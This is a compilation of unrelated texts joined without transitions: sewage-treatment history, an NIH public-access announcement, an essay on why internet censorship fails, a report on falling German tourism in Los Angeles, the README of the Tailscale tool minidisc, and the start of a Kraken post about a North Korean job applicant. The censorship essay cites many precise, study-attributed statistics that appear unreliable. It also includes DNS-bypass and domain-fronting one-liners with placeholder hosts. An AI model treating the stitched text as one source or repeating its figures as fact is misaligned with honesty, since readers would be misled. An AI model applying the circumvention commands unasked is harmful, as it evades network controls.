As a rule, pumping was deployed not to treat sewage but simply to flush it somewhere else. Cities piped the effluent into a river, lake, or shoreline further from the city — moving the problem, rather than solving it. But as urban populations grew, shunting away pollution became ever more difficult, both because the volume increased and because the land and waters around the city rose in value and their owners no longer wanted to accept it. The measures adopted by London after the Great Stink proved insufficient, as did other, similar measures elsewhere. Between 1898 and 1915, a British royal commission investigated the sewage problem. In a series of reports, it set the standards for most modern water systems.
One of its most historically significant recommendations was to separate storm water and sewage. Sewers have two main functions: carrying away storm water so neighborhoods don’t flood, and carrying away waste so they won’t be smelly and disease-ridden. Ancient and medieval sewer systems mixed both tasks, which meant that cities were covered in filth when heavy rains made sewers overflow into neighborhoods. Separating the two functions would not only keep the streets cleaner during storms but also reduce the burden on sewage-treatment systems.
How to Turn Sewage into Clean Water
Today, sewage treatment occurs in three steps, in an ascending ladder of squeamishness. The first, primary treatment, is an update to the old method of dumping effluent into rivers and lakes, except that it involves channeling diluted sewage into large tanks or basins. (Often it is passed through a screen along the way, which removes big, floating objects like sticks that might damage equipment.) Developed by several European sanitary engineers in the mid–nineteenth century, primary treatment is an advanced version of the settling pools in Mohenjo-Daro. As the water sits in the basin, the most disagreeable solids settle to the floor or float on the surface. Afterward, the muck is removed, usually by big paddles that sweep over the surface and floor of the tank, and then buried in landfills. In a few places, it is still spread on land and converted to fertilizer. Occasionally it is burned.
Secondary treatment, the next step, was invented by three researchers at the University of Manchester: Gilbert Fowler, Edward Ardern, and William Lockett. Now almost forgotten, the names of Fowler, Ardern, and Lockett should be emblazoned on city gates, for secondary treatment has made cities around the world into far more salubrious places. Nobel prizes have been awarded for advances far less consequential.
Primary treatment does not remove fine sediments — the water is often still vile. In a set of experiments in 1913, Fowler, Ardern, and Lockett added bacteria-rich sludge to the water from primary treatment and aerated it in much the same way that aquarium owners aerate their fish water with a bubbler. Aeration creates high oxygen levels in the water that encourage the bacteria to consume the remaining organic matter. After eating their fill, the researchers discovered, the bacteria sink to the bottom, where they can be scraped away for reuse. The recycling process is called, unromantically, “activated sludge.”
The water produced from secondary treatment looks and smells clean but still may not be potable, because neither primary nor secondary treatment eliminates all noxious chemicals and microorganisms. In a final step, tertiary treatment, the water is filtered again, for example by passing it through big towers full of sand. Then, depending on the facility, a variety of techniques are deployed to make the water potable. These include sprinkling chemicals in the water to remove nitrogen and phosphorus, adding chlorine or beaming ultraviolet radiation to kill remaining microorganisms, or forcing the water through a super-fine membrane that allows water molecules to pass through but not dissolved contaminants. All of these are costly, which is why governments typically have resisted them until forced to adopt them by public pressure.
These systems clean up water that people have used. Analogous systems are required to make water from wells, rivers, lakes, and so on potable. Different systems are used for different water sources in different places, but typically the incoming water must be filtered, clarified, and disinfected. And these steps, too, are costly, and have their own history of governmental foot-dragging.
The Hyperion Water Reclamation Plant in Los Angeles goes back to 1894, when it dumped raw sewage into the beach water. A screen to catch solid waste was added in 1925, and secondary treatment in 1950. Plans have been drawn up for revamping the plant to recycle over 200 million gallons of waste water per day into potable water by 2035, for an estimated project cost of up to $5 billion.
Aerial Archives / Alamy
A Looming Disaster
Journalists have an expression: MEGO, meaning My Eyes Glaze Over. It describes worthy and important subjects that people regard as too dull to think about. Water supply seems to be the essence of MEGO. Fixing urban networks is so expensive, time-consuming, and invisible to the public that governments historically have been unwilling to pay attention unless forced by disaster. Sometimes they have tried to hand the problem to private industry, but water is so obviously a public concern that in many cases the citizenry has resisted. All too often, the result has been systems that stagger along at barely satisfactory levels.
Cairo, Buenos Aires, and San Antonio; Dhaka, Istanbul, and Port-au-Prince; Miami, Manila, Monrovia, Mumbai, and Mexico City — all have greatly expanded in recent decades, and all have failed to keep up with the demand for clean, plentiful water. The statistics are stark. At a global scale, 40 percent of waste water is dumped without being safely treated, and 24 percent without being treated at all, which leaves about 2 billion people using water that can be polluted by feces, chemicals, or other contaminants.
The United States is better off than many places, but it has its own problems. Big public programs in the 1960s and 1970s gave us water systems whose cleanliness and reliability would have seemed like miracles in Johnny Appleseed’s day. The system our forebears constructed is vast: approximately 150,000 public drinking-water systems and more than 16,000 public waste-water treatment systems. These serve roughly 80 percent of the U.S. public. (The remainder have private wells and septic tanks, which are typically inspected by local governments when installed.)
But now these systems need to be rebuilt. Growing demand, increasingly severe droughts, and, above all, aging infrastructure are testing their limits. Almost half a million miles of pipe in North America is nearing the end of its useful life and will need to be replaced soon. Equally in need of upgrades are the thousands of treatment plants built in the 1970s. The U.S. Environmental Protection Agency estimates that maintaining the nation’s drinking water and waste water infrastructures will cost at least $1.2 trillion over the next twenty years. Water experts have been warning about these looming problems for decades. But nothing like the required sums has been committed. History suggests that the systems will not be maintained until there are several disasters. But the disasters could be avoided if voters understood the importance of their water supply, and made clean water a priority.
I am excited to announce that one of my first actions as NIH Director is pushing the accelerator on policies to make NIH research findings freely and quickly available to the public. The 2024 Public Access Policy, originally slated to go into effect on December 31, 2025, will now be effective as of July 1, 2025.
To be clear, maximum transparency regarding the research we support is our default position. Since the release of NIH’s 2008 Public Access Policy, more than 1.5 million articles reporting on NIH-supported research have been made freely available to the public through PubMed Central. While the 2008 Policy allowed for an up to 12-month delay before such articles were required to be made publicly available, in 2024, NIH revised the Public Access Policy to remove the embargo period so that researchers, students, and members of the public have rapid access to these findings.
NIH is the crown jewel of the American biomedical research system. However, a recent Pew Research Center study shows that only about 25% of Americans have a “great deal of confidence” that scientists are working for the public good. Earlier implementation of the Public Access Policy will help increase public confidence in the research we fund while also ensuring that the investments made by taxpayers produce replicable, reproducible, and generalizable results that benefit all Americans.
Providing speedy public access to NIH-funded results is just one of the ways we are working to earn back the trust of the American people. Trust in science is an essential element in Making America Healthy Again. As such, NIH and its research partners will continue to promote maximum transparency in all that we do.
Jay Bhattacharya, M.D., Ph.D.
Director, National Institutes of Health
Digital Dams That Don't Hold: Why Internet Censorship Fails as Technical Policy
Throughout history, governments and authorities have tried to control the flow of information. From the burning of the Library of Alexandria and the Catholic Church’s Index of Forbidden Books to Nazi book burnings and the Soviet Union’s censorship apparatus, controlling what people can read, share, and discuss has been a consistent impulse of those in power. In the digital age, this age-old impulse manifests as internet censorship—but with a crucial difference: the internet was fundamentally designed to resist it.
When authorities attempt to censor the internet, they’re effectively trying to plug holes in a digital dam with their fingers. The information doesn’t stop—it simply finds another path. This isn’t just a metaphor; it’s the technical reality of how the internet was architected, with protocols specifically designed to route around damage and disruption. As internet pioneer John Gilmore famously stated:
“The internet interprets censorship as damage and routes around it.”
Recent events in Spain and India highlight this technological reality in striking ways.
In Spain, LaLiga, the top Spanish professional football division, secured a court order allowing it to unilaterally block IP addresses it believes are being used to pirate livestreams of matches. Rather than targeting specific infringing services, LaLiga took the extreme step of blocking Cloudflare’s entire IP range while games are live—affecting thousands of legitimate websites that happen to use Cloudflare’s infrastructure during match weekends.
Cybernews - Spain’s fight against La Liga streaming pirates hurts thousands of innocent sites
Spanish authorities complied with this overbroad implementation without pushback, demonstrating how easily targeted enforcement can expand into widespread disruption. In response, Cloudflare launched a legal challenge against LaLiga over the IP blocks, but the Spanish courts upheld them.
LaLiga - Commercial Court No. 6 of Barcelona upholds the judgment issued in favour of LALIGA
In India, the Karnataka High Court directed the government to block ProtonMail entirely because a single Delhi-based design firm allegedly received emails with obscene content from a ProtonMail address.
TechCrunch - Indian court orders blocking of Proton Mail
This isn’t even the first such attempt in India—in early 2024, Tamil Nadu police requested a nationwide ProtonMail block after schools received bomb threats via the service. When Swiss authorities intervened in that case, ProtonMail aptly observed that “Blocking access to Proton Mail simply prevents law-abiding citizens from communicating securely and does not prevent cybercriminals from sending threats with another email service, especially if the perpetrators are located outside of India.”
These cases exemplify a fundamental misunderstanding of how the internet works—and why digital censorship is technically doomed to fail.
The Continuing Pattern of Failed Censorship
The cases from Spain and India highlighted in the introduction exemplify a broader technical reality that has held throughout the internet’s history. While the specifics vary—from blocking infrastructure providers like Cloudflare to censoring communication platforms like ProtonMail—the underlying technical dynamics are identical.
These cases aren’t isolated incidents. Similar scenarios have played out across different countries and contexts, from Turkey’s YouTube blocks to Russia’s Telegram ban, with remarkably consistent technical outcomes regardless of the political or social context in which they occur. To understand why these censorship attempts inevitably fail, we need to examine the fundamental architectural features of the internet that make censorship technically problematic, regardless of context or justification.
The Technical Reality: Four Fundamental Flaws in Internet Censorship
Internet censorship faces several fundamental technical challenges that make it both ineffective and harmful, regardless of the context in which it’s implemented:
1. Digital Detours: Why Technical Circumvention is Inevitable
Any moderately technical user can bypass most blocking mechanisms using:
Virtual Private Networks (VPNs)
The Tor network
Alternative DNS servers
Proxy services
Mirror sites
According to a 2017 Global Web Index study (Global Web Index - VPN Usage Study, 2017), approximately 30% of internet users worldwide have used VPNs, with that number rising to over 60% in countries with more internet restrictions. In countries with significant censorship, these circumvention tools become common knowledge, rendering blocks largely symbolic rather than effective.
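The “alternative DNS servers” item in the list above is, for example, a one-line change; the domain below is a placeholder:
# Query Cloudflare's public resolver directly, bypassing the ISP
# resolver where DNS-based blocks are typically applied.
dig @1.1.1.1 blocked-site.example A +short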
2. The Streisand Effect: When Censorship Becomes Publicity
Named after a 2003 incident where Barbra Streisand’s attempts to suppress photographs of her Malibu home resulted in those images being seen by millions, the infamous “Streisand Effect” describes the unintended consequence where efforts to hide or censor information lead to its wider dissemination.
This phenomenon has been extensively studied by internet researchers. When authorities block access to a service like ProtonMail or a website, several counterproductive effects occur:
Immediate attention amplification:
News of the block spreads quickly through social media and tech publications, drawing attention to the very service authorities wanted to suppress.
Search interest spike:
Research from the Berkman Klein Center for Internet & Society at Harvard University found that Google searches for blocked content typically increase by 200-300% in the days following blocking actions. (Harvard - New Berkman Klein Center study examines global internet censorship)
Technical education:
Blocking motivates users to learn circumvention techniques they might never have explored otherwise, creating a more technically sophisticated user base.
Martyrdom effect:
Blocked services often gain sympathy and support, particularly from digital rights advocates and privacy-conscious users who view them as victims of censorship.
The Spanish Cloudflare block and Indian ProtonMail block are likely to repeat this pattern. For example, when Turkey blocked Twitter in 2014, Turkish Twitter usage actually increased by 138% in the immediate aftermath as users found and shared workarounds.
3. Splash Damage: The Unavoidable Collateral Impact
Internet censorship is not surgical—it’s more akin to carpet bombing in the digital space. The internet’s infrastructure is built on shared resources, interconnected systems, and layered services. This architecture makes precise targeting virtually impossible. When authorities block infrastructure providers like Cloudflare or entire communications platforms like ProtonMail, they disrupt access to an enormous range of legitimate services. This affects journalists communicating with sources, businesses protecting sensitive communications, educational institutions, healthcare providers, and countless other legitimate users. The Internet Society’s comprehensive 2017 report on content blocking (Internet Society - Internet Shutdowns and Content Blocking not the answer) found that all major censorship techniques produce substantial collateral damage:
IP blocking:
Frequently blocks innocent websites, users, and services sharing the same IP address
DNS blocking:
Affects all services on a domain, not just problematic content
Deep packet inspection:
Creates security vulnerabilities and performance issues
URL filtering:
Often over-blocks related content and under-blocks target content
This technical reality means there is no “clean” way to implement censorship without affecting legitimate users and services—a fundamental architectural limitation of the internet that cannot be engineered away.
4. Technological Arms Race: The Never-Ending Game of Cat and Mouse
Internet censorship initiates a technological arms race with a predictable pattern:
Authorities implement a censorship technique
Services and users develop countermeasures
Authorities respond with more sophisticated censorship
Services and users deploy more advanced circumvention
This pattern has played out repeatedly across decades of internet governance attempts worldwide. When messaging apps are blocked, they implement domain fronting techniques. When websites are censored, mirror sites proliferate. When email services are restricted, encrypted alternatives emerge.
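Domain fronting, for instance, exploits the gap between the hostname a censor can see during the TLS handshake and the one the server actually routes on inside the encrypted connection; the hostnames below are hypothetical:
# The censor sees only the allowed CDN hostname in the TLS handshake;
# the Host header, sent inside the encrypted tunnel, names the blocked
# service, which the CDN then routes the request to.
curl -H "Host: blocked-service.example" https://allowed-cdn.example/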
Research from the Oxford Internet Institute’s Internet Policy Observatory (MIT Press - Access Controlled) has documented how this technological evolution consistently outpaces censorship efforts:
Blocking methods typically remain effective for only 3-6 months before widespread circumvention develops
Each new generation of censorship requires exponentially more resources to implement
Circumvention techniques become progressively easier to use and more accessible to average users
The costs to authorities increase while the costs to users decrease over time
This asymmetric dynamic heavily favors the circumvention side, making censorship a temporary solution at best and often merely symbolic after initial implementation.
History Repeats Itself: Case Studies in Failed Censorship
History provides ample evidence that website blocking rarely achieves its intended goals:
When Turkey blocked YouTube for insulting content related to Atatürk, network traffic analysis revealed that YouTube usage actually increased by 33% during the ban. According to research published in the International Journal of Communication, approximately 70% of Turkish internet users learned to use DNS redirection or proxy services for the first time. Turkish users rapidly shared circumvention techniques through text messages and forums, with an estimated 4.5 million Turkish users regularly accessing YouTube despite the official block. By the ban’s end, VPN usage in Turkey had increased from under 10% to over 30% of internet users.
When the UK implemented court-ordered ISP blocks of The Pirate Bay in 2012, research by the University of Amsterdam (UvA-DARE - Global Online Piracy Study, pages 27-28) found that P2P traffic dropped initially but normalized to pre-block levels within just 7 days. Traffic analysis showed that within one month, there were over 300 functioning Pirate Bay proxy sites being used by UK users. Perhaps most telling: during the first year of blocking, the number of UK-based Pirate Bay users increased by approximately 12%, despite the “block.” Technical monitoring revealed that users rapidly shifted to using VPNs, proxy services, alternative DNS servers, Tor, and mirror sites.
Russia’s communications regulator Roskomnadzor blocked over 19 million IP addresses in an attempt to disrupt Telegram. Despite this massive action, Telegram’s usage in Russia dropped by only 7% for approximately three days before exceeding pre-block levels. Within two weeks, Telegram had gained approximately 500,000 new Russian users. To circumvent the block, Telegram implemented domain fronting techniques using Google and Amazon cloud services, prompting Russia to inadvertently block millions of innocent websites and services. By the time Russia officially abandoned the blocking effort in 2020, Telegram had nearly doubled its Russian user base to 30 million.
China has invested an estimated $6-10 billion annually in its censorship infrastructure—the most sophisticated system in the world. Despite this enormous investment, studies by the Citizen Lab (Citizen Lab Report - Search Monitor Project: Toward a Measure of Transparency) show that between 29% and 35% of Chinese internet users regularly employ VPNs to bypass censorship. China’s technical cat-and-mouse game includes deep packet inspection that can detect and block many VPN protocols, yet new obfuscation techniques like Shadowsocks (created by a Chinese programmer in 2012) are continuously developed and widely used. Even after China criminalized unauthorized VPN usage in 2018 with penalties of up to $2,200, VPN usage has continued to grow at approximately 5-7% annually.
Noble Intentions, Same Technical Failures: Censorship Under Different Pretexts
Not all censorship attempts are made to suppress political opposition or protect business interests. In recent years, governments have increasingly justified internet restrictions as necessary to combat misinformation or protect “national interests.” These efforts face the same technical limitations:
Brazil’s Election Misinformation Efforts (2018-2022)
: During Brazil’s contentious elections, the Superior Electoral Court ordered the blocking of dozens of news sites and social media accounts accused of spreading election misinformation. Despite deploying sophisticated content filtering, technical analysis showed that within 48 hours, over 85% of the blocked content had migrated to alternative domains, Telegram channels, and WhatsApp groups. Court documents revealed that for every account blocked, an average of 3.7 mirror accounts appeared elsewhere, often with larger audiences due to the “forbidden information” appeal.
Turkey’s “National Security” Blocks (2016-present)
: Following the 2016 coup attempt, Turkey blocked over 240,000 websites and 150,000 URLs under national security provisions. Network measurement studies by the Internet Society found that despite this massive effort, politically sensitive content saw a 42% increase in circulation through encrypted messaging apps and VPN-protected social media. By 2020, Turkey had the second-highest VPN adoption rate globally at 32% of internet users—a direct consequence of the censorship regime.
India’s “Public Order” Shutdowns
: India leads the world in regional internet shutdowns, implementing over 400 since 2016, often justified by preventing the spread of rumors that could lead to violence. Research from the Internet Freedom Foundation found that during shutdowns, misinformation actually increased by 33-41% in affected regions as legitimate news sources became inaccessible while rumors spread through SMS and offline networks. The technical inability to selectively block only “harmful” content led to blanket approaches that proved counterproductive.
South Korea’s “Fake News” Regulations
: South Korea’s attempts to algorithmically identify and block “fake news” through its comprehensive filtering system demonstrated the technical impossibility of accurate content classification. A 2021 Seoul National University study (Seoul National University - Fact-Checking and Audience Engagement) found the system had a 37% false positive rate—blocking legitimate news and commentary—while missing 42% of content that violated the same standards but used simple evasion techniques like image-based text or deliberate misspellings.
These examples demonstrate that regardless of intention—whether preventing harm from misinformation or protecting alleged national interests—the technical limitations of internet censorship remain constant. Well-intentioned efforts face the same circumvention techniques, collateral damage problems, and ultimate ineffectiveness as more obviously self-interested censorship attempts. The internet’s distributed architecture fundamentally resists centralized content control, regardless of the justification behind that control.
For more comprehensive reading on internet freedom and on political rights and civil liberties by country, check out Freedom House - Country Scores.
Beyond Censorship:
Addressing Root Causes with Technical Solutions
Effective approaches to online problems typically address underlying issues rather than symptoms:
Market-Based Solutions to Piracy:
Research consistently shows that improving legal access to content at reasonable prices dramatically reduces piracy. When Netflix entered new markets, piracy rates measurably declined, according to a 2018 study by the European Commission’s Joint Research Centre (EU JRC, “Online Copyright Enforcement, Consumer Behavior, and Market Structure”). This study found that for every 4.7% increase in legal streaming service subscriptions, there was a 3.1% decrease in visits to illegal streaming sites.
Spotify’s expansion across Europe similarly correlated with significant decreases in music piracy. When content is:
Affordable
Easily accessible
Provided with good user experience
Available without delays
…the incentive to seek illegal alternatives naturally diminishes.
Targeted Enforcement for Abusive Communications:
Rather than blocking entire platforms like ProtonMail, digital forensics and international legal cooperation have proven more effective against targeted abuse. Email headers, server logs, and digital footprints can often identify perpetrators even when they use privacy-focused services.
Law enforcement agencies with proper training and resources can work through established legal channels such as Mutual Legal Assistance Treaties (MLATs) to request specific information from service providers about abusive accounts, all without disrupting service for legitimate users.
Collaborative Content Moderation Frameworks:
For harmful content issues, multi-stakeholder approaches that bring together platforms, civil society, and governments to establish transparent content moderation standards have shown more long-term success than blocking. The Global Internet Forum to Counter Terrorism (GIFCT) demonstrates how cross-platform cooperation can address specific problematic content while preserving overall access and functionality.
Conclusion:
Technical Reality vs. Political Expediency
The technical reality of internet architecture makes censorship fundamentally flawed as a policy approach. It resembles trying to stop a river with a chain-link fence—water simply flows around it, while debris gets caught.
When policymakers and authorities implement internet censorship, they’re often choosing political expediency over technical effectiveness. Censorship appears decisive and creates the impression of immediate action—a press release can announce that something has been “blocked” and the problem “solved.” This political expediency—prioritizing the appearance of action over actual results—explains why censorship remains popular despite decades of technical evidence demonstrating its ineffectiveness.
What we consistently observe across different countries and contexts is that internet censorship creates:
A false sense of action without addressing underlying problems
Technical workarounds that quickly render censorship ineffective
Significant collateral damage to legitimate users and services
Educational opportunities that actually increase technical literacy around circumvention
The gap between political expediency and technical reality continues to widen. While blocking ProtonMail or Cloudflare might satisfy short-term political needs to appear “tough on crime” or “protective of intellectual property,” the technical architecture of the internet ensures these measures will fail to achieve their stated objectives while causing substantial collateral damage.
As we navigate complex digital challenges like piracy, harmful communications, and content moderation, effective approaches must work with, rather than against, the internet’s technical architecture. Solutions that address economic incentives, create proper accountability mechanisms, and establish collaborative governance frameworks have consistently outperformed censorship in both effectiveness and minimizing collateral damage.
The recent censorship attempts in various countries are likely to follow the same well-documented pattern we’ve seen for over two decades: temporary disruption followed by widespread circumvention, with legitimate users bearing the greatest burden. This isn’t a political conclusion—it’s what the technical evidence consistently demonstrates.
Recession Indicator: Bookings for the German Tour Bus in Los Angeles Are Down 30%
I live close to the famous Venice Beach boardwalk in Los Angeles, one of the most popular tourist spots in California and, by extension, the United States. The Venice Beach boardwalk is so famous, in fact, that it is one of just a few stops on Sandra & Dennis’s German-language bus tours. Every summer, I’ll be walking my dog when dozens of people visiting from Germany hop off the bus to “experience the American way of life” at a beach that has appeared in many movies and is known for Muscle Beach, the skatepark, the surfing, and the many trashy t-shirt and souvenir shops.
These throngs of tourists are just one small part of Los Angeles’ tourism industry, but they are a hyperspecific one. Almost everyone who does these tours is visiting the United States from Germany. By all accounts, tourism to the United States has plummeted due to the Trump administration detaining random tourists, worsening perceptions and boycotts of the United States due to his trade war, and the fact that he is sending some immigrants to the Salvadoran megaprison CECOT. Many countries have issued travel advisories for tourists wanting to visit the United States, and Goldman Sachs estimates that the U.S. could miss out on as much as $90 billion in revenue from a fall in tourism and Trump’s trade war.
The American tourism industry is sooooooo screwed.
Tuesday, Trump said “tourism is way up,” a ludicrous statement that is refuted by every statistic or bit of information that we have seen so far. Here is another anecdotal data point: Sandra & Dennis’s bus tours, which cater directly to German tourists, have seen a 30 percent drop in bookings from German visitors this summer.
In most cases, accurately estimating the impact of Trump’s haphazard and messy immigration policies on any individual business is quite difficult. But because Sandra & Dennis’s bus tours cater directly to German tourists, I thought I would email them to see if there has been an impact on their business. Their company’s website is entirely in German, even though the company itself is based in Los Angeles. Owner Dennis Sulies responded quickly, and said that the company has “definitely noticed a drop—about 30 percent—in bookings from German visitors to LA.”
Sulies said that it remains difficult for him to determine what percentage of the drop is due to Trump’s policies and how much of it is due to the wildfires that devastated Los Angeles in January. The wildfires were not Trump’s fault, but, in one of his first acts as president, Trump portrayed Los Angeles as a hellhole; most of Los Angeles remains totally open. Trump’s administration, meanwhile, has gutted FEMA and the climate research arms of the government.
“The decline started earlier this year, and while the current tariff discussions are certainly a factor, the first major hit came in January. That’s when a lot of families typically plan their vacations, and unfortunately, media reports in Germany were showing LA as being engulfed in wildfires. That really discouraged early bookings,” Sulies said. “The political climate, including Trump’s return and administration policies, has added to the general uncertainty. So while the tariffs are a newer concern, the combination of media coverage and political shifts has already had a visible impact on tourism from Germany.”
“That said, we’ve also seen a small positive effect from falling airfares. Lower prices are attracting new, more spontaneous travelers who jump on last-minute bargain flights to the U.S. It’s a different customer segment, but it helps balance things out a bit. As for immigration, most Europeans—including our German guests—enter with an ESTA, and we haven’t heard any specific issues or complaints. The entry process still seems to be running fairly smoothly,” he added. “Overall, we still believe the U.S. is a safe and welcoming country to visit, regardless of the administration in power.” ESTA is an online visa waiver program available to tourists from the European Union and from several other countries.
If the last thing you heard about LA was the fires, I live here and I can tell you that the vast majority of the city remains fully functioning and a perfectly good place for tourists to visit despite the awful tragedy of the fires. That being said, it is completely understandable that international visitors would decide not to come here as the Trump administration threatens undocumented immigrants, people here on visas, and tourists and wages a unilateral trade war on the entire world. The losers in this case are the American businesses and cities that rely on tourists and the revenue they bring in to make ends meet.
About the author
Jason is a cofounder of 404 Media. He was previously the editor-in-chief of Motherboard. He loves the Freedom of Information Act and surfing.
minidisc: Zero-config service discovery for Tailscale networks
Lobsters
github.com
2025-05-01 15:53:45
It enables seamless advertisement and discovery of gRPC or REST services across a Tailnet without the need for a centralized server. Services equipped with Minidisc form a lightweight peer-to-peer network, ensuring that as long as a service is active, it remains discoverable.
Zero-config service discovery for Tailscale networks
With minidisc, you can advertise and discover gRPC or REST services on your
Tailnet with zero configuration. There's no need to run a server either —
minidisc-enabled services form a simple peer-to-peer network, so as long as a
service is up, you can discover it.
Status
For now, primary support is available for Python and Go. Other languages can rely on the command line tool md as a stopgap. The only verified platform is Linux.
At the time of writing, Minidisc is in active use at the author's own work and has been performing nicely, but overall this system has seen relatively little mileage. If you need something battle-hardened, Minidisc isn't for you yet. But if it looks useful to you, do give it a try and let me know how it goes!
How to use
Client
Minidisc maps service names and sets of key-value labels to IP:port pairs. To
find a service, you specify the name and a (sub)set of labels you care about.
Minidisc then returns the address of the first match it finds.
For example, to create a gRPC channel in Python you can do this:
import grpc
import minidisc

endpoint = minidisc.find_service('myservice', {'env': 'prod'})
channel = grpc.insecure_channel(endpoint)
# ... now use the channel to create gRPC stubs.
Or if you'd rather have a list of all available services to pick and choose from, call minidisc.list_services().
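For instance, a quick way to eyeball everything on the Tailnet — a sketch that assumes only that the return value is iterable; check the repo for the exact shape of each entry:

import minidisc

# Print every service currently advertised on the Tailnet.
# (Whatever shape the entries have, printing them works.)
for svc in minidisc.list_services():
    print(svc)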
In Go, things work similarly:
import (
    "log"

    "github.com/mscheidegger/minidisc/go/pkg/minidisc"
    "google.golang.org/grpc"
    "google.golang.org/grpc/credentials/insecure"
)

func main() {
    labels := map[string]string{"env": "prod"}
    addr, err := minidisc.FindService("myservice", labels)
    if err != nil {
        log.Fatalf("Minidisc is unavailable: %v", err)
    }
    clientConn, err := grpc.NewClient(
        addr.String(),
        grpc.WithTransportCredentials(insecure.NewCredentials()),
    )
    // ... now use the clientConn.
}
If you're limiting yourself to Go and gRPC, there's also a fancier way to do the same: a custom resolver. With this, you can use URLs to find Minidisc services:
import (
    "github.com/mscheidegger/minidisc/go/pkg/mdgrpc"
    "google.golang.org/grpc"
    "google.golang.org/grpc/credentials/insecure"
)

func main() {
    mdgrpc.RegisterResolver()
    clientConn, err := grpc.NewClient(
        "minidisc://myservices?env=prod",
        grpc.WithTransportCredentials(insecure.NewCredentials()),
    )
    // ... now use the clientConn.
}
Server
A server on the Tailnet advertises its services by starting a Minidisc Registry
and then adding entries. Everything else happens automatically in the
background.
For Go:
import (
    "log"

    "github.com/mscheidegger/minidisc/go/pkg/minidisc"
)

func main() {
    // Initialise the service at "port", then...
    registry, err := minidisc.StartRegistry()
    if err != nil {
        log.Fatalf("Minidisc is unavailable: %v", err)
    }
    labels := map[string]string{"env": "prod"}
    registry.AdvertiseService(port, "myservice", labels)
    // Now you can enter the serving loop.
}
After this, the registry will advertise your service to the Tailnet as long as
your process stays alive (and you don't turn off Tailscale). For Python it's
similar:
import minidisc

# Set up your service...
registry = minidisc.start_registry()
registry.advertise_service(port, 'myservice', {'env': 'prod'})
# Now enter the serving loop.
Command line
In addition to the Go and Python libraries, there's also the command line tool
md
, which offers similar functionality.
To list all services on the Tailnet:
To find a matching service:
md find myservice env=prod
Most importantly, md also lets you advertise services of servers that don't support Minidisc themselves:
The md tool is also available as a Docker image (but see the section on Docker for how to make things work).
Docker
Minidisc unfortunately doesn't work out-of-the-box when run in Docker with a Tailscale sidecar as described in the Tailscale documentation. With the default setup suggested in the docs, the necessary Unix domain socket of tailscaled is only available within the sidecar, not the main Docker container.
The easiest way to make this work is to put the socket into a shared volume in your compose.yaml. Here's an example:
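A minimal sketch of what such a compose.yaml might look like — the image tags, the auth key, the socket path, and the service name foobar are illustrative assumptions, not the project's verbatim example:

services:
  tailscale:
    image: tailscale/tailscale:latest
    environment:
      - TS_AUTHKEY=tskey-auth-...                    # your Tailscale auth key
      - TS_SOCKET=/var/run/tailscale/tailscaled.sock # move the socket out of /tmp
    volumes:
      - tailscale-socket:/var/run/tailscale

  foobar:
    image: foobar:latest                             # your minidisc-enabled service
    network_mode: service:tailscale                  # share the sidecar's network
    depends_on:
      - tailscale
    volumes:
      - tailscale-socket:/var/run/tailscale          # same volume in both containers

volumes:
  tailscale-socket: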
Two details matter here:
The top-level volume tailscale-socket. This allows foobar to access the tailscaled daemon. Note how it's used in both containers.
Setting TS_SOCKET. The Tailscale Docker image defaults to putting the socket into /tmp otherwise.
With these changes, Minidisc should work inside the foobar container.
Behind the scenes
The discovery network
At its core, Minidisc is a simplistic peer-to-peer network. Because Tailnets provide a trusted environment with a known, relatively small set of network hosts (just run tailscale status to see them), we can skip most of the bootstrapping and routing magic that "real" peer-to-peer networks do.
Minidisc nodes all attempt to bind to the same port 28004 on their local Tailnet
address (100.x.x.x). When a client wants to list advertised services, it will
simply enumerate all online IPs on the Tailnet and try to contact port 28004 on
each — a manual broadcast if you will.
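To make that "manual broadcast" concrete, here is a rough sketch in Python — not minidisc's actual code, and the JSON field names (Peer, TailscaleIPs) from tailscale status --json are assumptions that may vary across Tailscale versions:

import json
import socket
import subprocess

MINIDISC_PORT = 28004

def probe_tailnet(timeout=0.25):
    """Return Tailnet IPv4 addresses that answer on the Minidisc port."""
    status = json.loads(
        subprocess.check_output(["tailscale", "status", "--json"])
    )
    reachable = []
    for peer in status.get("Peer", {}).values():
        for ip in peer.get("TailscaleIPs", []):
            if ":" in ip:  # skip IPv6 addresses for brevity
                continue
            try:
                # If something accepts the connection, a node lives here.
                with socket.create_connection((ip, MINIDISC_PORT), timeout):
                    reachable.append(ip)
            except OSError:
                pass  # host offline or no Minidisc node on it
    return reachable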
If a node can't bind to port 28004, it can instead bind to an arbitrary port available on its IP and register this port as a delegate on another node that did bind to 28004 (the leader). After this registration, the leader will not only advertise its own services, but also the delegate's. This continues until the connection between the two breaks off (usually because one of the processes died). At that point, the leader will deregister the delegate, and the delegate will rejoin the network, attempting to become a leader again.
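The bind-or-delegate decision can be sketched in a few lines of Python (an illustration only: the real registration handshake between delegate and leader isn't shown, since its wire format isn't described here):

import socket

MINIDISC_PORT = 28004

def become_leader_or_delegate(local_ip):
    """Try to claim the well-known port; fall back to delegate mode."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.bind((local_ip, MINIDISC_PORT))
        role = "leader"    # we answer discovery queries for this host
    except OSError:
        sock.bind((local_ip, 0))  # port taken: grab any free port instead
        role = "delegate"  # then register this port with the leader (handshake omitted)
    return sock, role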
We identified a North Korean hacker who tried to get a job at Kraken
Every day, our dedicated security and IT teams successfully repel a wide range of attacks from various bad actors. From our years of experience, we know how vast the attack vectors of any major company are. And as we’re disclosing today, they can include unexpected areas, such as the company’s recruitment process.
Our teams recently identified a North Korean hacker’s attempts to infiltrate our ranks by applying for a job at Kraken.
Watch CBS News’ full coverage of how Kraken identified — and then strategically interacted with — a North Korean hacker who tried to get a job at Kraken
What started as a routine hiring process for an engineering role quickly turned into an intelligence gathering operation, as our teams carefully advanced the candidate through our hiring process to learn more about their tactics at every stage of the process.
This is an established challenge for the crypto community, with estimates indicating that North Korean hackers stole over $650 million from crypto firms in 2024 alone. We’re disclosing these events today as part of our ongoing transparency efforts and to help companies, both in crypto and beyond, strengthen their defenses.
The candidate’s red flags
From the outset, something felt off about this candidate. During their initial call with our recruiter, they joined under a different name from the one on their resume, and quickly changed it. Even more suspicious, the candidate occasionally switched between voices, indicating that they were being coached through the interview in real time.
Before this interview, industry partners had tipped us off that North Korean hackers were actively applying for jobs at crypto companies. We received a list of email addresses linked to the hacker group, and one of them matched the email the candidate used to apply to Kraken.
With this intelligence in hand, our Red Team launched an investigation using Open-Source Intelligence gathering (OSINT) methods. One method involved analyzing breach data, which hackers often use to identify users with weak or reused passwords. In this instance, we discovered that one of the emails associated with the malicious candidate was part of a larger network of fake identities and aliases.
